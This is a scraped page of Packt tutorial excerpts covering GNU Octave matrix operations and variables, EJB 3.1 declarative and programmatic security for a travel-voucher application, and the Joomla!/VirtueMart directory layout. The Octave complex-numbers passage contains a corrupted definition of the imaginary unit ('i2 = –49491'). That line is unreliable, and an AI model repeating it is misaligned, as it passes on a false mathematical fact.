matrix with size n x m. From this, we know that the number of columns of the "left" matrix must match the number of rows of the "right" matrix. We may think of this as (n x k)(k x m) = n x m. In the example above, the matrix product AB therefore results in a 2 x 3 matrix: Time for action – doing multiplication operations Let us try to perform some of the same operations for multiplication as we did for addition: octave:75> a*a ans = 4 octave:76> a*b ans = 2 4 6 octave:77> b*b error: operator *: nonconformant arguments (op1 is 1x3, op2 is 1x3) octave:78> b*c ans = 14 What just happened? From Command 75, we see that * multiplies two scalar variables just like standard multiplication. In agreement with linear algebra, we can also multiply a scalar by each element in a vector as shown by the output from Command 76. Command 77 produces an error—recall that b is a row vector which Octave also interprets as a 1 x 3 matrix, so we try to perform the matrix multiplication (1 x 3)(1 x 3), which is not valid. In Command 78, on the other hand, we have (1 x 3)(3 x 1) since c is a column vector yielding a matrix with size 1 x 1, that is, a scalar. This is, of course, just the dot product between b and c. Let us try an additional example and perform the matrix multiplication between A and B discussed above. First, we need to instantiate the two matrices, and then we multiply them: octave:79> A=[1 2; 3 4]; B=[1 2 3; 4 5 6]; octave:80> A*B ans = 9 12 15 19 26 33 octave:81> B*A error: operator *: nonconformant arguments (op1 is 2x3, op2 is 2x2) Seems like Octave knows linear algebra! Element-by-element, power, and transpose operations If the sizes of two arrays are the same, Octave provides a convenient way to multiply the elements element-wise. For example, for B: octave:82> B.*B ans = 1 4 9 16 25 36 Notice that the period (full stop) character precedes the multiplication operator. The period character can also be used in connection with other operators. For example: octave:83> B.+B ans = 2 4 6 8 10 12 which is the same as the command B+B. If we wish to raise each element in B to the power 2.1, we use the element-wise power operator.ˆ: octave:84> B.^2.1 ans = 1.0000 4.2871 10.0451 18.3792 29.3655 43.0643 You can perform element-wise power operation on two matrices as well (if they are of the same size, of course): octave:85> B.^B ans = 1 4 27 256 3125 46656 If the power is a real number, you can use ˆ instead of .ˆ; that is, instead of Command 84 above, you can use: octave:84>Bˆ2.1 Transposing a vector or matrix is done via the 'operator. To transpose B, we simply type: octave:86> B' ans = 1 4 2 5 3 6 Strictly, the ' operator is a complex conjugate transpose operator. We can see this in the following examples: octave:87> B = [1 2; 3 4] + I.*eye(2) B = 1 + 1i 2 + 0i 3 + 0i 4 + 1i octave:88> B' ans = 1 - 1i 3 - 0i 2 - 0i 4 - 1i Note that in Command 87, we have used the .* operator to multiply the imaginary unit with all the elements in the diagonal matrix produced by eye(2). Finally, note that the command transpose(B)or the operator .' will transpose the matrix, but not complex conjugate the elements.
Read more
  • 0
  • 0
  • 8422

article-image-ejb-31-controlling-security-programmatically-using-jaas
Packt
17 Jun 2011
5 min read
Save for later

EJB 3.1: Controlling Security Programmatically Using JAAS

Packt
17 Jun 2011
5 min read
  EJB 3.1 Cookbook Build real world EJB solutions with a collection of simple but incredibly effective recipes The reader is advised to refer the initial two recipies from the previous article on the process of handling security using annotations. Getting ready Programmatic security is affected by adding code within methods to determine who the caller is and then allowing certain actions to be performed based on their capabilities. There are two EJBContext interface methods available to support this type of security: getCallerPrincipal and isCallerInRole. The SessionContext object implements the EJBContext interface. The SessionContext's getCallerPrincipal method returns a Principal object which can be used to get the name or other attributes of the user. The isCallerInRole method takes a string representing a role and returns a Boolean value indicating whether the caller of the method is a member of the role or not. The steps for controlling security programmatically involve: Injecting a SessionContext instance Using either of the above two methods to effect security How to do it... To demonstrate these two methods we will modify the SecurityServlet to use the VoucherManager's approve method and then augment the approve method with code using these methods. First modify the SecurityServlet try block to use the following code. We create a voucher as usual and then follow with a call to the submit and approve methods. out.println("<html>"); out.println("<head>"); out.println("<title>Servlet SecurityServlet</title>"); out.println("</head>"); out.println("<body>"); voucherManager.createVoucher("Susan Billings", "SanFrancisco", BigDecimal.valueOf(2150.75)); voucherManager.submit(); boolean voucherApproved = voucherManager.approve(); if(voucherApproved) { out.println("<h3>Voucher was approved</h3>"); } else { out.println("<h3>Voucher was not approved</h3>"); } out.println("<h3>Voucher name: " + voucherManager.getName() + "</h3>"); out.println("</body>"); out.println("</html>"); Next, modify the VoucherManager EJB by injecting a SessionContext object using the @Resource annotation. public class VoucherManager { ... @Resource private SessionContext sessionContext; Let's look at the getCallerPrincipal method first. This method returns a Principal object (java.security.Principal) which has only one method of immediate interest: getName. This method returns the name of the principal. Modify the approve method so it uses the SessionContext object to get the Principal and then determines if the name of the principal is "mary" or not. If it is, then approve the voucher. public boolean approve() { Principal principal = sessionContext.getCallerPrincipal(); System.out.println("Principal: " + principal.getName()); if("mary".equals(principal.getName())) { voucher.setApproved(true); System.out.println("approve method returned true"); return true; } else { System.out.println("approve method returned false"); return false; } } Execute the SecurityApplication using "mary" as the user. The application should approve the voucher with the output as shown in the following screenshot: Execute the application again with a user of "sally". This execution will result in an exception. INFO: Access exception The getCallerPrincipal method simply returns the principal. This frequently results in the need to explicitly include the name of a user in code. The hard coding of user names is not recommended. Checking against each individual user can be time consuming. It is more efficient to check to see if a user is in a role. The isCallerInRole method allows us to determine whether the user is in a particular role or not. It returns a Boolean value indicating whether the user is in the role specified by the method's string argument. Rewrite the approve method to call the isCallerInRole method and pass the string "manager" to it. If the return value returns true, approve the voucher. public boolean approve() { if(sessionContext.isCallerInRole("manager")) { voucher.setApproved(true); System.out.println("approve method returned true"); return true; } else { System.out.println("approve method returned false"); return false; } } Execute the application using both "mary" and "sally". The results of the application should be the same as the previous example where the getCallerPrincipal method was used. How it works... The SessionContext class was used to obtain either a Principal object or to determine whether a user was in a particular role or not. This required the injection of a SessionContext instance and adding code to determine if the user was permitted to perform certain actions. This approach resulted in more code than the declarative approach. However, it provided more flexibility in controlling access to the application. These techniques provided the developer with choices as to how to best meet the needs of the application. There's more... It is possible to take different actions depending on the user's role using the isCallerInRole method. Let's assume we are using programmatic security with multiple roles. @DeclareRoles ({"employee", "manager","auditor"}) We can use a validateAllowance method to accept a travel allowance amount and determine whether it is appropriate based on the role of the user. public boolean validateAllowance(BigDecimal allowance) { if(sessionContext.isCallerInRole("manager")) { if(allowance.compareTo(BigDecimal.valueOf(2500)) <= 0) { return true; } else { return false; } } else if(sessionContext.isCallerInRole("employee")) { if(allowance.compareTo(BigDecimal.valueOf(1500)) <= 0) { return true; } else { return false; } } else if(sessionContext.isCallerInRole("auditor")) { if(allowance.compareTo(BigDecimal.valueOf(1000)) <= 0) { return true; } else { return false; } } else { return false; } } The compareTo method compares two BigDecimal values and returns one of three values: -1 – If the first number is less than the second number 0 – If the first and second numbers are equal 1 – If the first number is greater than the second number The valueOf static method converts a number to a BigDecimal value. The value is then compared to allowance. Summary This article covered programmatic EJB security based upon the Java Authentication and Authorization Service (JAAS) API. Further resources on this subject: EJB 3.1: Introduction to Interceptors [Article] EJB 3.1: Working with Interceptors [Article] Hands-on Tutorial on EJB 3.1 Security [Article] EJB 3 Entities [Article] Developing an EJB 3.0 entity in WebLogic Server [Article] Building an EJB 3.0 Persistence Model with Oracle JDeveloper [Article] NetBeans IDE 7: Building an EJB Application [Article]
Read more
  • 0
  • 0
  • 1527

article-image-interacting-gnu-octave-variables
Packt
17 Jun 2011
8 min read
Save for later

Interacting with GNU Octave: Variables

Packt
17 Jun 2011
8 min read
GNU Octave Beginner's Guide Become a proficient Octave user by learning this high-level scientific numerical tool from the ground up          In the following, we shall see how to instantiate simple variables. By simple variables, we mean scalars, vectors, and matrices. First, a scalar variable with name a is assigned the value 1 by the command: octave:1> a=1 a = 1 That is, you write the variable name, in this case a, and then you assign a value to the variable using the equal sign. Note that in Octave, variables are not instantiated with a type specifier as it is known from C and other lower-level languages. Octave interprets a number as a real number unless you explicitly tell it otherwise. In Octave, a real number is a double-precision, floating-point number,which means that the number is accurate within the first 15 digits. Single precision is accurate within the first 6 digits. You can display the value of a variable simply by typing the variable name: octave:2>a a = 1 Let us move on and instantiate an array of numbers: octave:3 > b = [1 2 3] b = 1 2 3 Octave interprets this as the row vector: rather than a simple one-dimensional array. The elements (or the entries) in a row vector can also be separated by commas, so the command above could have been: octave:3> b = [1, 2, 3] b = 1 2 3 To instantiate a column vector: you can use: octave:4 > c = [1;2;3] c = 1 2 3 Notice how each row is separated by a semicolon. We now move on and instantiate a matrix with two rows and three columns (a 2 x 3 matrix): using the following command: octave:5 > A = [1 2 3; 4 5 6] A = 1 2 3 4 5 6 Notice that I use uppercase letters for matrix variables and lowercase letters for scalars and vectors, but this is, of course, a matter of preference, and Octave has no guidelines in this respect. It is important to note, however, that in Octave there is a difference between upper and lowercase letters. If we had used a lowercase a in Command 5 above, Octave would have overwritten the already existing variable instantiated in Command 1. Whenever you assign a new value to an existing variable, the old value is no longer accessible, so be very careful whenever reassigning new values to variables. Variable names can be composed of characters, underscores, and numbers. A variable name cannot begin with a number. For example, a_1 is accepted as a valid variable name, but 1_a is not. In this article, we shall use the more general term array when referring to a vector or a matrix variable. Accessing and changing array elements To access the second element in the row vector b, we use parenthesis: octave:6 > b(2) ans = 2 That is, the array indices start from 1. This is an abbreviation for "answer" and is a variable in itself with a value, which is 2 in the above example. For the matrix variable A, we use, for example: octave:7> A(2,3) ans = 6 to access the element in the second row and the third column. You can access entire rows and columns by using a colon: octave:8> A(:,2) ans = 2 5 octave:9 > A(1,:) ans = 1 2 3 Now that we know how to access the elements in vectors and matrices, we can change the values of these elements as well. To try to set the element A(2,3)to -10.1: octave:10 > A(2,3) = -10.1 A = 1.0000 2.0000 3.0000 4.0000 5.0000 -10.1000 Since one of the elements in A is now a non-integer number, all elements are shown in floating point format. The number of displayed digits can change depending on the default value, but for Octave's interpreter there is no difference—it always uses double precision for all calculations unless you explicitly tell it not to. You can change the displayed format using format short or format long. The default is format short. It is also possible to change the values of all the elements in an entire row by using the colon operator. For example, to substitute the second row in the matrix A with the vector b (from Command 3 above), we use: octave:11 > A(2,:) = b A = 1 2 3 1 2 3 This substitution is valid because the vector b has the same number of elements as the rows in A. Let us try to mess things up on purpose and replace the second column in A with b: octave:12 > A(:,2) = b error: A(I,J,...) = X: dimension mismatch Here Octave prints an error message telling us that the dimensions do not match because we wanted to substitute three numbers into an array with just two elements. Furthermore, b is a row vector, and we cannot replace a column with a row. Always read the error messages that Octave prints out. Usually they are very helpful. There is an exception to the dimension mismatch shown above. You can always replace elements, entire rows, and columns with a scalar like this: octave:13> A(:,2) = 42 A = 1 42 3 1 42 3 More examples It is possible to delete elements, entire rows, and columns, extend existing arrays, and much more. Time for action – manipulating arrays To delete the second column in A, we use: octave:14> A(:,2) = [] A = 1 3 1 3 We can extend an existing array, for example: octave:15 > b = [b 4 5] b = 1 2 3 4 5 Finally, try the following commands: octave:16> d = [2 4 6 8 10 12 14 16 18 20] d = 2 4 6 8 10 12 14 16 18 20 octave:17> d(1:2:9) ans = 2 6 10 14 18 octave:18> d(3:3:12) = -1 d = 2 4 -1 8 10 -1 14 16 -1 20 0 -1 What just happened? In Command 14, Octave interprets [] as an empty column vector and column 2 in A is then deleted in the command. Instead of deleting a column, we could have deleted a row, for example as an empty column vector and column 2 in A is then deleted in the command. octave:14> A(2,:)=[] On the right-hand side of the equal sign in Command 15, we have constructed a new vector given by [b 4 5], that is, if we write out b, we get [1 2 3 4 5] since b=[1 2 3]. Because of the equal sign, we assign the variable b to this vector and delete the existing value of b. Of course, we cannot extend b using b=[b; 4; 5] since this attempts to augment a column vector onto a row vector. Octave first evaluates the right-hand side of the equal sign and then assigns that result to the variable on the left-hand side. The right-hand side is named an expression. In Command 16, we instantiated a row vector d, and in Command 17, we accessed the elements with indices 1,3,5,7, and 9, that is, every second element starting from 1. Command 18 could have made you a bit concerned! d is a row vector with 10 elements, but the command instructs Octave to enter the value -1 into elements 3, 6, 9 and 12, that is, into an element that does not exist. In such cases, Octave automatically extends the vector (or array in general) and sets the value of the added elements to zero unless you instruct it to set a specific value. In Command 18, we only instructed Octave to set element 12 to -1, and the value of element 11 will therefore be given the default value 0 as seen from the output. In low-level programming languages, accessing non-existing or non-allocated array elements may result in a program crash the first time it is running2. This will be the best case scenario. In a worse scenario, the program will work for years, but then crash all of a sudden, which is rather unfortunate if it controls a nuclear power plant or a space shuttle. As you can see, Octave is designed to work in a vectorized manner. It is therefore often referred to as a vectorized programming language. Complex variables Octave also supports calculations with complex numbers. As you may recall, a complex number can be written as z = a + bi, where a is the real part, b is the imaginary part, and i is the imaginary unit defined from i2 = –49491. To instantiate a complex variable, say z = 1 + 2i, you can type: octave:19> z = 1 + 2I z = 1 + 2i When Octave starts, the variables i, j, I, and J are all imaginary units, so you can use either one of them. I prefer using I for the imaginary unit, since i and j are often used as indices and J is not usually used to symbolize i. To retrieve the real and imaginary parts of a complex number, you use: octave:20> real(z) ans = 1 octave:21>imag(z) ans = 2 You can also instantiate complex vectors and matrices, for example: octave:22> Z = [1 -2.3I; 4I 5+6.7I] Z = 1.0000 + 0.0000i 0.0000 - 2.3000i 0.0000 + 4.0000i 5.0000 + 6.7000i Be careful! If an array element has non-zero real and imaginary parts, do not leave any blanks (space characters) between the two parts. For example, had we used Z=[1 -2.3I; 4I 5 + 6.7I] in Command 22, the last element would be interpreted as two separate elements (5 and 6.7i). This would lead to dimension mismatch. The elements in complex arrays can be accessed in the same way as we have done for arrays composed of real numbers. You can use real(Z) and imag(Z) to print the real and imaginary parts of the complex array Z. (Try it out!)
Read more
  • 0
  • 0
  • 2757
article-image-hands-tutorial-ejb-31-security
Packt
15 Jun 2011
9 min read
Save for later

Hands-on Tutorial on EJB 3.1 Security

Packt
15 Jun 2011
9 min read
EJB 3.1 Cookbook Security is an important aspect of many applications. Central to EJB security is the control of access to classes and methods. There are two approaches to controlling access to EJBs. The first, and the simplest, is through the use of declarative annotations to specify the types of access permitted. The second approach is to use code to control access to the business methods of an EJB. This second approach should not be used unless the declarative approach does not meet the needs of the application. For example, access to a method may be denied during certain times of the day or during certain maintenance periods. Declarative security is not able to handle these types of situations. In order to incorporate security into an application, it is necessary to understand the Java EE environment and its terminology. The administration of security for the underlying operating system is different from that provided by the EE server. The EE server is concerned with realms, users and groups. The application is largely concerned with roles. The roles need to be mapped to users and groups of a realm for the application to function properly. A realm is a domain for a server that incorporates security policies. It possesses a set of users and groups which are considered valid users of an application. A user typically corresponds to an individual while a group is a collection of individuals. Group members frequently share a common set of responsibilities. A Java EE server may manage multiple realms. An application is concerned with roles. Access to EJBs and their methods is determined by the role of a user. Roles are defined in such a manner as to provide a logical way of deciding which users/groups can access which methods. For example, a management type role may have the capability to approve a travel voucher whereas an employee role should not have that capability. By assigning certain users to a role and then specifying which roles can access which methods, we are able to control access to EJBs. The use of groups makes the process of assigning roles easier. Instead of having to map each individual to a role, the user is assigned to a group and the group is mapped to a role. The business code does not have to check every individual. The Java EE server manages the assignment of users to groups. The application needs only be concerned with controlling a group's access. A group is a server level concept. Roles are application level. One group can be associated with multiple applications. For example, a student group may use a student club and student registration application while a faculty group might also use the registration application but with more capability. A role is simply a name for a set of capabilities. For example, an auditor role may be to review and certify a set of accounts. This role would require read access to many, if not all, of the accounts. However, modification privileges may be restricted. Each application has its own set of roles which have been defined to meet the security needs of the application. The EE server manages realms consisting of users, groups, and resources. The server will authenticate users using Java's underlying security features. The user is then referred to as a principal and has a credential containing the user's security attributes. During the deployment of an application, users and groups are mapped to roles of the application using a deployment descriptor. The configuration of the deployment descriptor is normally the responsibility of the application deployer. During the execution of the application, the Java Authentication and Authorization Service (JAAS) API authenticates a user and creates a principal representing the user. The principal is then passed to an EJB. Security in a Java EE environment can be viewed from different perspectives. When information is passed between clients and servers, transport level security comes into play. Security at this level can include Secure HTTP (HTTPS) and Secure Sockets Layer (SSL). Messages can be sent across a network in the form of Simple Object Access Protocol (SOAP) messages. These messages can be encrypted. The EE container for EJBs provides application level security which is the focus of the chapter. Most servers provide unified security support between the web container and the EJB container. For example, calls from a servlet in a web container to an EJB are handled automatically resulting in a flexible security mechanism. Most of the recipes presented in this article are interrelated. If your intention is to try out the code examples, then make sure you cover the first two recipes as they provide the framework for the execution of the other recipes. In the first recipe, Creating the SecurityApplication, we create the foundation application for the remaining recipes. In the second recipe, Configuring the server to handle security, the basic steps needed to configure security for an application are presented. The use of declarative security is covered in the Controlling security using declarations recipe while programmatic security is discussed in the next article on Controlling security programmatically. The Understanding and declaring roles recipe examines roles in more detail and the Propagating identity recipe talks about how the identity of a user is managed in an application. Creating the SecurityApplication In this article, we will create a SecurityApplication built around a simple Voucher entity to persist travel information. This is a simplified version of an application that allows a user to submit a voucher and for a manager to approve or disapprove it. The voucher entity itself will hold only minimal information. Getting ready The illustration of security will be based on a series of classes: Voucher – An entity holding travel-related information VoucherFacade – A facade class for the entity AbstractFacade – The base class of the VoucherFacade VoucherManager – A class used to manage vouchers and where most of the security techniques will be demonstrated SecurityServlet – A servlet used to drive the demonstrations All of these classes will be members of the packt package in the EJB module except for the servlet which will be placed in the servlet package of the WAR module. How to do it... Create a Java EE application called SecurityApplication with an EJB and a WAR module. Add a packt package to the EJB module and an entity called Voucher to the package. Add five private instance variables to hold a minimal amount of travel information: name, destination, amount, approved, and an id. Also, add a default and a three argument constructor to the class to initialize the name, destination, and amount fields. The approved field is also set to false. The intent of this field is to indicate whether the voucher has been approved or not. Though not shown below, also add getter and setter methods for these fields. You may want to add other methods such as a toString method if desired. @Entity public class Voucher implements Serializable { private String name; private String destination; private BigDecimal amount; private boolean approved; @Id @GeneratedValue(strategy = GenerationType.AUTO) private Long id; public Voucher() { } public Voucher(String name, String destination, BigDecimal amount) { this.name = name; this.destination = destination; this.amount = amount; this.approved = false; } ... } Next, add an AbstractFacade class and a VoucherFacade class derived from it. The VoucherFacade class is shown below. As with other facade classes found in previous chapters, the class provides a way of accessing an entity manager and the base class methods of the AbstractFacade class. @Stateless public class VoucherFacade extends AbstractFacade<Voucher> { @PersistenceContext(unitName = "SecurityApplication-ejbPU") private EntityManager em; protected EntityManager getEntityManager() { return em; } public VoucherFacade() { super(Voucher.class); } } Next, add a stateful EJB called VoucherManager. Inject an instance of the VoucherFacade class using the @EJB annotation. Also add an instance variable for a Voucher. We need a createVoucher method that accepts a name, destination, and amount arguments, and then creates and subsequently persists the Voucher. Also, add get methods to return the name, destination, and amount of the voucher. @Stateful public class VoucherManager { @EJB VoucherFacade voucherFacade; Voucher voucher; public void createVoucher(String name, String destination, BigDecimal amount) { voucher = new Voucher(name, destination, amount); voucherFacade.create(voucher); } public String getName() { return voucher.getName(); } public String getDestination() { return voucher.getDestination(); } public BigDecimal getAmount() { return voucher.getAmount(); } ... } Next add three methods: submit – This method is intended to be used by an employee to submit a voucher for approval by a manager. To help explain the example, display a message showing when the method has been submitted. approve – This method is used by a manager to approve a voucher. It should set the approved field to true and return true. reject – This method is used by a manager to reject a voucher. It should set the approved field to false and return false. @Stateful public class VoucherManager { ... public void submit() { System.out.println("Voucher submitted"); } public boolean approve() { voucher.setApproved(true); return true; } public boolean reject() { voucher.setApproved(false); return false; } } To complete the application framework, add a package called servlet to the WAR module and a servlet called SecurityServlet to the package. Use the @EJB annotation to inject a VoucherManager instance field into the servlet. In the try block of the processRequest method, add code to create a new voucher and then use the submit method to submit it. Next, display a message indicating the submission of the voucher. public class SecurityServlet extends HttpServlet { @EJB VoucherManager voucherManager; protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { response.setContentType("text/html;charset=UTF-8"); PrintWriter out = response.getWriter(); try { voucherManager.createVoucher("Susan Billings", "SanFrancisco", BigDecimal.valueOf(2150.75)); voucherManager.submit(); out.println("<html>"); out.println("<head>"); out.println("<title>Servlet SecurityServlet</title>"); out.println("</head>"); out.println("<body>"); out.println("<h3>Voucher was submitted</h3>"); out.println("</body>"); out.println("</html>"); } finally { out.close(); } } ... } Execute the SecurityServlet. Its output should appear as shown in the following screenshot: How it works... In the Voucher entity, notice the use of BigDecimal for the amount field. This java.math package class is a better choice for currency data than float or double. Its use avoids problems which can occur with rounding. The @GeneratedValue annotation, used with the id field, is for creating an entity facade. In the VoucherManager class, notice the injection of the stateless VoucherFacade session EJB into a stateful VoucherManager EJB. Each invocation of a VoucherFacade method may result in the method being executed against a different instance of VoucherManager. This is the correct use of a stateless session EJB. The injection of a stateful EJB into a stateless EJB is not recommended.  
Read more
  • 0
  • 0
  • 1780

article-image-overview-joomla-virtuemart
Packt
15 Jun 2011
12 min read
Save for later

An overview of Joomla! and VirtueMart

Packt
15 Jun 2011
12 min read
Navigating through the Joomla! and VirtueMart directories You should have a Joomla! and VirtueMart e-commerce site installed somewhere. If not, you should now install one first before reading on. From this point onward, we will assume that you can access a Joomla! VirtueMart site and can freely browse its content, either on your local computer using the file manager of your operating system or in a web server somewhere using an FTP client program. To work on the exercises, you should also be able to edit each of the files. OK. Let's start our study by navigating through the Joomla! directories. If you look at the root of your Joomla! site, you will be amazed how large the Joomla! project is. There are totally close to 5,000 files under some 350 directories! It would be difficult to find your way through this vast structure of files if there are no hints at all. Fortunately, Joomla! has a very good directory structure and will be easy to follow once you know its basic organization. Knowing your way through this vast structure is very important when embarking on any VirtueMart customization project of considerable size. The good news is that usually we only need to know a very small fraction of those 350 directories and 5,000 files. In the Joomla! root, the most important directories we need to know are the administrator, components, modules, and plugins directories (This does not mean that the other directories are not important. We highlight these few directories just because they are the directories we will reference from time-to-time) You will probably recognize that the last three of these shortlisted directories correspond to the three major extension types of Joomla! So within these directories, we will expect to see a series of subdirectories, each of which corresponds to an extension installed in the Joomla! framework. This is exactly the case, except for the plugins where the directories are arranged in terms of their type instead of their source. Let's take a closer look at one of the most important components that comes with Joomla!. Navigate to the components directory and open the subdirectory com_content. The com_content component is the one that manages articles we created in Joomla!. You have probably been using a lot of this component. Within this directory, you will find a number of files and a few subdirectories. We notice there is a file named controller.php and two subdirectories named models and views. We will have more to say on these in a moment. Let's move back to the root directory and take a look at the last important directory mentioned above. This administrator directory mimics the root directory in many respects. We see that most of the subdirectories we found in the root have a corresponding subdirectory within the administrator directory. For example, we find subdirectories named components and modules within the administrator as well. As we know, there are two main sections of a Joomla! website, also known as the frontend and the backend. The root directory and administrator directory are respectively the location where the frontend and backend files are located. While this dividing line is not rigid, we can use this as a guide when we want to locate a frontend or backend file. Since both the root and the administrator directories contain a subdirectory called components, to avoid ambiguity, we will refer to them as the root components and administrator components directory, respectively. Now, let's work our way a little bit down the directory tree to see how VirtueMart fits into this framework. Within the root components directory, you will see a subdirectory called com_virtuemart. Yes, this is the location where you can find all the files used by VirtueMart for the frontend. Under the com_virtuemart directory, among some other files and subdirectories, you will notice a themes subdirectory. You will find each of the VirtueMart themes you have installed there. The themes directory is the major work area. From now on, we will refer to the com_virtuemart directory under the root components directory as the root VirtueMart directory or the frontend VirtueMart directory. Within the administrator components directory, there is also a subdirectory called com_virtuemart where the backend VirtueMart files are located. Under this main directory, there are four subdirectories named as classes, html, languages, and sql. Obviously, these directories will contain, respectively, the class files, HTML files, language files, and SQL (also known as database) files. Actually, the classes and html directories have a deeper meaning than their names suggest, as we shall see in a moment. Structure of the Joomla! URL path Before leaving our high-level exploration of the Joomla! tree structure, let's digress a little bit to study how a Joomla! URL is built up. While the Joomla! directory structure is so complicated, the URL used to access the site is much simpler. Most of the time, the URL just starts with index.php?. (If you have a Search Engine Friendly or SEF system enabled, you should turn it off during the development and testing of your customization, or at least turn it off mentally while we are talking about the URL. You can turn off SEF in the Joomla! Configuration page.) For example, if we want to access the VirtueMart (frontend) home page, we can use the following URL: http://your_joomla_live_site/index.php?option=com_virtuemart Similarly, the URL http://your_joomla_live_site/administrator/index.php?option=com_virtuemart will bring up the VirtueMart backend control panel, if you're already logged in. All other Joomla! URL, in fact, work in the same way, although many times you see some additional parameters as well. (Don't forget to replace your_joomla_live_site in the above URL with your domain name and the Joomla! root directory, in case the site is not installed in the root.) Actually, the index.php script is the main entry into your Joomla! site. All major requests to the frontend start from here (major requests only since there are some other entry points as well, but they don't bother us at this point). Similarly, all major requests to the backend start from the file administrator/index.php. Restricting the entry point to the site makes it very easy to control authorized and unauthorized accesses. For example, if we want to put the site offline, we can simply change a configuration in Joomla! and all components will be offline as well. We don't need to change each page or even each component one-by-one. Understanding the structure of the Joomla! URL is pretty useful during the development and debugging process. Sometimes we may need to work on a partly live site in which the Joomla! site is already working, but the VirtueMart shop is still under construction. In such cases, it is common to unpublish the menu items for the shop so that the shop is still hidden from the public. The fact that the menu item is hidden actually means the shop is less accessible but not inaccessible. If we want to test the VirtueMart shop, we can still type the URL on the browser by ourselves. Using the URL http://your_joomla_live_site/index.php?option=com_virtuemart we can bring up the VirtueMart home page. We will learn some more tricks in testing individual shop pages along the way of our study of VirtueMart themes and templates. One simple application of what we learnt about the URL can be used when customizing Joomla!. When working with VirtueMart projects, we will need to go to the VirtueMart backend from time-to-time to modify the VirtueMart settings. As we all know, after logging in, what we have on the browser window is the control panel page. We will need to point to the components/virtuemart menu before we can open the VirtueMart backend home. This is not a complicated task, but will be very tedious if repeated every time we log back into the site. Can we make Joomla! smarter, to open the VirtueMart home by default when we log on? Yes, we can. The trick actually relates to what we talked about so far. If you want to customize Joomla! to open the VirtueMart backend by default, you can stay with me for the following warm-up exercise. I understand some of you may not want to change the default login page. Exercise 1.1: Making the Joomla! backend default to VirtueMart Open your favorite text editor. Navigate to the Joomla! site root. Open the file administrator/includes/helper.php. At around line 44 (the actual line may vary from version-to-version), change the code $option = 'com_cpanel'; to $option = 'com_virtuemart'; Save the file. Open your browser and log in to your Joomla! site. Alas, you should see the VirtueMart control panel instead of the Joomla! control panel. This simple exercise demonstrated that sometimes a useful change does not need complex coding. What we need is a little knowledge of how things work. I bet you probably understand what we have done above without explanation. After login, Joomla! will automatically go to the default component, hardcoded in the file helper.php. For standard Joomla!, this will be the com_cpanel component. In Exercise 1.1, we have changed this default backend component from com_cpanel to com_virtuemart. Instead of VirtueMart, we can certainly change the default to other components such as community builder or MOSET. Joomla! 1.5 presentation framework Since VirtueMart is a Joomla! component, it cannot exist outside Joomla!. So before diving into the detail of the VirtueMart engine, it pays to take a brief look at how Joomla! actually works. While an understanding of the presentation framework of Joomla! and VirtueMart may be useful for themes and templates development, it is not essential for the actual customization design. Joomla! emerged from version 1.0 and later developed into 1.5. In this upgrade, Joomla! has been basically rewritten from the ground up. A presentation structure called Model-View-Controller or MVC has been adopted in Joomla! 1.5. While a detailed explanation of the MVC structure is out of the scope, a basic understanding of its working will help us understand why and how VirtueMart 1.1 behaves in the way it is right now. Joomla! is a web application. Each page of Joomla! is in fact a text file consisting of HTML code. Depending on the detail parameters of a web request, Joomla! will generate a dynamic HTML page by combining data stored in the database and site configuration data stored in various PHP files. In the early history of dynamic web pages, program code were written in a way that HTML tags are mixed with presentation logic in one place. The spaghetti code, as it is sometimes called, makes maintenance and extension of the coding very difficult. As the basic structure of a dynamic web page is better understood, more and more new coding patterns emerge to make the life of a web developer easier. The MVC presentation framework is one of those patterns that have been proposed to build computer applications. This framework has gradually become the standard pattern for building web applications and has been adopted by many open source web projects. Models In the MVC presentation framework , the job of building a web page is divided into three main tiers. The backend tier is the data that is stored in the database (strictly speaking, there is no prescribed data storage format though a database is a natural way to manage the data). We need to grab data needed to build the web page. This tier of the job is done by the Model, which describes how data is stored and how data can be retrieved from the data server. Views The frontend tier determines what and how data is presented on the browser. This is the job of the View. For a given dataset from a Model, there can be many different ways to present the data. Let's say, we have a set of statistical data, for example. We can present this data as a bar graph or a pie chart. Each of these presentations is called a View of the same Model. Controllers Now statistical data is just a set of numbers. How can we convert them into a bar graph or a pie chart? That is exactly how the Controller comes into place. A Controller is a routine specifying how to convert the Model into various Views. One major advantage of this separation of data (Model) and presentation (View) makes changes to the application much easier. We can change the presentation independent of the underlying data and vice versa. So, in the Joomla! 1.5 world, we will have a set of Models which interface with the database, a set of Views to tell the browser how to present the data, and a set of Controllers that control how to convert the Model into the View. According to the best practice, all Joomla! 1.5 components should follow this same structure. Thus, each Joomla! 1.5 component should have two subdirectories called models and views. Also, the root directory will contain a controller.php which extends the Joomla! controller's capability. This structure is revealed as we look at the contents of a Joomla! component which we had done previously. However, because of historical reasons and others, not all components follow this best practice. VirtueMart is one of those exceptions.
Read more
  • 0
  • 0
  • 1735